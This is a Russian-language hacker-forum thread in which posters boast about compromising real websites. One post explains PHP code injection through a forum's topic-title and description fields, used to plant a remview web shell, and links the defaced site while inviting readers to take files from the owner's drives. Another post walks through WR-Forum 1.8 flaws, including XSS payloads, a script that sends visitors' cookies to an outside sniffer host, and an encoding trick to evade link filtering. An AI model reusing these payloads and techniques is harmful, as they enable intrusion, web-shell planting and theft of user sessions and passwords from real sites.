Значит дефейс делал не я а знакомый (don_Pedro) Глюк форума - неправильная проверка названия темы. В назание темы можно написать PHP: "; phpinfo(); "123 Но без PHP: <? ?> Таким же макаром был вставлен шелл ремвью. Результат http://www.klipov.net/forum/ http://www.klipov.net/remview.php Подпись http://www.klipov.net/ По названию видно что клипов там нет. Поэтому заходим на диск D: E: Z: и берём там неклипы, нефильмы и т.д. Просиба не хамить там (не вы же старались). Ну разве чуть-чуть.
ну Brun немножно сухо написал.... попробую добавить... Сначала вытянул пас админа (это другая история ) так вот, залез в админку.... подумал как залить шел.... Форум, сразу скажу совковый, нет ниодной опции чтобы залить туда какой-нить файл... нарыл интересную опцию "описание форума" Попробовал вставить туда PHP: <? phpinfo(); ?> не порулило потом начал думать.... в каком виде может сохранятся это описание.... скорее всего это происходит так PHP: $opisanie="opisanie etogo foruma"; это наводит на одну мысль... если форум совковый, так может творцы сего форума не удосужились проверять строку описания, а? ну попробовал ввести вот-так PHP: "; phpinfo(); "123 тут немножко обьясню ход мысли... сначала нам надо сообщить РНР, что переменная, в которую записывается описание форума уже "закончилась". вот для этого ставим PHP: "; дальше понятно, PHP: phpinfo(); и последний штрих PHP: "123 это чтобы не возникло приблизительно вот такой ошибки так как в нас остались два символа PHP: "; которые сначала закрывали переменную с описанием форума.... проверил - работает...... ну если работает, то что нам мешает вместо любимого PHP: phpinfo(); втулить туда код шела? кто-то скажет: ведь длина описания наверно регулируется... а фиг вам, таварисчи, если творцы форума ламеры, то они ламеры во всем вставил код шела, перед этим убрал PHP: <? и ?> заработало вот так вот ЗЫЖ а шо это я под ником don_Pedro не смог зарегицца? вродь нет такого юзера....
2nix а хз, не проверял, кстати, ты хоть смотрел на тот сайт?? прикол в том, что делал его один мего-ламер, хостится это все дело у него на компе дома, кажись в Испании, на винде... а ща самое интересное.... НА ДЕНВЕРЕ кстати он типа пропалил.. ну ниче, еще что-нить найдем
Напишу мини-мануал-историю (надо же мне на этом форуме с чего то начинать!) На форуме WR-Forum © 1.8 совершенно нет проверки на html у себя в подписи... да что там в подписи, вообще практически нигде нету! Дело было где то часа в 2 ночи... думаю... проект новенький, интересный! есть раздел по JavaScript где мне могут помочь! Но тут столкнулся с неприятностью... В нужном разделе показалось сообщение: Немного обидевшись решил создать где нить в другом разделе.. и что я увидел: Code: [B]index.php?fid=[COLOR=Red]8[/COLOR]&newtema=add[/B] Дай ка думаю номер нужного раздела поставлю... и уваля! Работает! вот так и обходим ограничение тем М... понравилось! решил поиграть с форумом) гыгы) автор скрипта-редиска! Code: [B]index.php?fid=[COLOR=Red]9999[/COLOR]&newtema=add[/B] Далее, ввёл номер форума которого нету... и... он есть, наверно "скрытый" раздел... index.php?fid=x x-любая цифра хех... ещё при добавлении сообщения можно спокойно вернуться назад и ещё раз добавить мессагу) короче оспамить легко! А теперь самое интересное... XSS У себя в инфе в подписи, да и в других полях анкеты делайте что хотите! =) Хотим что бы жуткий аллерт досаждал посетителям? Пишем у себя в статусе: Code: [COLOR=Red]<IMG SRC=JaVaScRiPt:alert('XSS by DCRM')>[/COLOR] Хотите стырить куки? Возьмём к примеру снифер: Code: [COLOR=Red]http://s.netsec.ru/[/COLOR] Далее подумав, делаем так: Code: [COLOR=Red]<script>[/COLOR][COLOR=Green]img.src = "'http://s.netsec.ru/[I]ваш логин[/I].gif?'+document.cookie;"[/COLOR][COLOR=Red]</script>[/COLOR] Но у автора стоит ограничение на длину сообщения... кхм... поиграем по его правилам, не долго думая сделал файлик скрипта и залил к себе на хост... => всё да ничего, но у автор форума сделал замену тексту ссылок на хреф... и это не проблема, достаточно лишь закодировать 1ю букву адреса: Code: [COLOR=Red]<SCRIPT[/COLOR] SRC=[COLOR=Green]"http://%77ww.xxx.xx/x.xx"[/COLOR][COLOR=Red]></script>[/COLOR] И уваля! остаётся только ждать... И того, это первый мой интересный взлом) спасибо за внимание! P.s. а дальше дело техники и воображения) Админ есть... куки есть, кстати в незашифрованном виде там пассы...
